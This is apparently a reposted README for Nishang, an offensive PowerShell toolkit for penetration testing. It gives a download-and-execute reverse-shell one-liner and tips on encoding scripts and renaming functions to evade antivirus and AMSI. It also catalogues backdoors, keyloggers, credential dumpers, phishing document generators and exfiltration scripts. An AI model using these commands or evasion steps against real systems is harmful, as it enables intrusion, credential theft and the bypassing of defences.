Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.By
nikhil_mittUsageImport all the scripts in the current PowerShell session (PowerShell v3 onwards).
PS C:\nishang> Import-Module .\nishang.psm1
Use the individual scripts with dot sourcing.
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
PS C:\nishang> Get-Information
To get help about any script or function, use:
PS C:\nishang> Get-Help [scriptname] -full
Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
For example, to see the help about Get-WLAN-Keys.ps1, use
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
PS C:\nishang> Get-Help Get-WLAN-Keys -Full
Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
Method 2. Use the
-encodedcommand (or
-e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes)
"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".
Encode the scrript using Invoke-Encode from Nishang:
PS C:\nishang> . \nishang\Utility\Invoke-Encode
PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt
From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
C:\Users\target> powershell -e [encodedscript]
If the scripts still get detected changing the function and parameter names and removing the help content will help.
In case Windows 10's AMSI is still blocking script execution, see this blog:
http://www.labofapenetrationtester.com/2016/09/amsi.htmlScriptsNishang currently contains the following scripts and payloads.
ActiveDirectorySet-DCShadowPermissionsModify AD objects to provide minimal permissions required for DCShadow.
Antak - the WebshellAntakExecute PowerShell scripts in memory, run commands, and download and upload files using this webshell.
BackdoorsHTTP-BackdoorA backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
DNS_TXT_PwnageA backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
Execute-OnTimeA backdoor which can execute PowerShell scripts at a given time on a target.
Gupt-BackdoorA backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
Add-ScrnSaveBackdoorA backdoor which can use Windows screen saver for remote command and script execution.
Invoke-ADSBackdoorA backdoor which can use alternate data streams and Windows Registry to achieve persistence.
Add-RegBackdoorA backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).
Set-RemoteWMIModify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
Set-RemotePSRemotingModify permissions of PowerShell remoting to allow access to a non-admin user.
BypassInvoke-AmsiBypassImplementation of publicly known methods to bypass/avoid AMSI.
ClientOut-CHMCreate infected CHM files which can execute PowerShell commands and scripts.
Out-WordCreate Word files and infect existing ones to run PowerShell commands and scripts.
Out-ExcelCreate Excel files and infect existing ones to run PowerShell commands and scripts.
Out-HTACreate a HTA file which can be deployed on a web server and used in phishing campaigns.
Out-JavaCreate signed JAR files which can be used with applets for script and command execution.
Out-ShortcutCreate shortcut files capable of executing PowerShell commands and scripts.
Out-WebQueryCreate IQY files for phishing
credentials and SMB hashes.
Out-JSCreate JS files capable of executing PowerShell commands and scripts.
Out-SCTCreate SCT files capable of executing PowerShell commands and scripts.
Out-SCFCreate a SCF file which can be used for capturing NTLM hash challenges.
EscalationEnable-DuplicateTokenWhen SYSTEM privileges are required.
Remove-UpdateIntroduce
vulnerabilities by removing patches.
Invoke-PsUACmeBypass UAC.
ExecutionDownload-Execute-PSDownload and execute a PowerShell script in memory.
Download_ExecuteDownload an executable in text format, convert it to an executable, and execute.
Execute-Command-MSSQLRun PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
Execute-DNSTXT-CodeExecute shellcode in memory using DNS TXT queries.
Out-RundllCommandExecute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.
GatherCheck-VMCheck for a virtual machine.
Copy-VSSCopy the SAM file using Volume Shadow Copy Service.
Invoke-CredentialsPhishTrick a user into giving credentials in plain text.
FireBuster FireListenerA pair of scripts for egress testing
Get-InformationGet juicy information from a target.
Get-LSASecretGet LSA Secret from a target.
Get-PassHashesGet password hashes from a target.
Get-WLAN-KeysGet WLAN keys in plain text from a target.
KeyloggerLog keystrokes from a target.
Invoke-MimikatzWdigestDowngradeDump user passwords in plain on Windows 8.1 and Server 2012
Get-PassHintsGet password hints of Windows users from a target.
Show-TargetScreenConnect back and Stream target screen using MJPEG.
Invoke-MimikatzLoad mimikatz in memory. Updated and with some customisation.
Invoke-MimikittenzExtract juicy information from target process (like browsers) memory using regex.
Invoke-SSIDExfilExfiltrate information like user credentials, using WLAN SSID.
Invoke-SessionGopherIdentify admin jump-boxes and/or computers used to access Unix machines.
MITMInvoke-InterceptorA local HTTPS proxy for MITM attacks.
PivotCreate-MultipleSessionsCheck credentials on multiple computers and create PSSessions.
Run-EXEonRemote Copy and execute an executable on multiple machines.
Invoke-NetworkRelay Create network relays between computers.
PrasadhakPrasadhakCheck running hashes of running process against the VirusTotal database.
ScanBrute-ForceBrute force FTP, Active Directory, MSSQL, and Sharepoint.
Port-ScanA handy port scanner.
PowerpreterPowerpreterAll the functionality of nishang in a single script module.
ShellsInvoke-PsGcatSend commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
Invoke-PsGcatAgentExecute commands and scripts sent by Invoke-PsGcat.
Invoke-PowerShellTcpAn interactive PowerShell reverse connect or bind shell
Invoke-PowerShellTcpOneLineStripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
Invoke-PowerShellTcpOneLineBindBind version of Invoke-PowerShellTcpOneLine.
Invoke-PowerShellUdpAn interactive PowerShell reverse connect or bind shell over UDP
Invoke-PowerShellUdpOneLineStripped down version of Invoke-PowerShellUdp.
Invoke-PoshRatHttpsReverse interactive PowerShell over HTTPS.
Invoke-PoshRatHttpReverse interactive PowerShell over HTTP.
Remove-PoshRatClean the system after using Invoke-PoshRatHttps
Invoke-PowerShellWmiInteractive PowerShell using WMI.
Invoke-PowerShellIcmpAn interactive PowerShell reverse shell over ICMP.
Invoke-JSRatRundllAn interactive PowerShell reverse shell over HTTP using rundll32.exe.
Invoke-JSRatRegsvrAn interactive PowerShell reverse shell over HTTP using regsvr32.exe.
UtilityAdd-ExfiltrationAdd data
exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
Add-PersistenceAdd reboot persistence capability to a script.
Remove-PersistenceRemote persistence added by the Add-Persistence script.
Do-ExfiltrationPipe (|) this to any script to exfiltrate the output.
DownloadTransfer a file to the target.
Parse_KeysParse keys logged by the keylogger.
Invoke-EncodeEncode and compress a script or string.
Invoke-DecodeDecode and decompress a script or string from Invoke-Encode.
Start-CaptureServerRun a web server which logs Basic authentication and SMB hashes.
ConvertTo-ROT13Encode a string to ROT13 or decode a ROT13 string.
Out-DnsTxtGenerate DNS TXT records which could be used with other scripts.
[Base64ToString]
[StringToBase64]
[ExetoText]
[TexttoExe]
UpdatesUpdates about Nishang can be found at my blog
http://labofapenetrationtester.com and my Twitter feed @nikhil_mitt.
Bugs, Feedback and Feature RequestsPlease raise an issue if you encounter a bug or have a feature request. You can email me at nikhil [dot] uitrgpv at gmail.com
Blog PostsSome helpful blog posts to check out for beginners:
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.htmlhttp://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.htmlhttp://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.htmlhttp://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.htmlAll posts about Nishang:
http://www.labofapenetrationtester.com/search/label/Nishangvia
KitPloitRelated articles
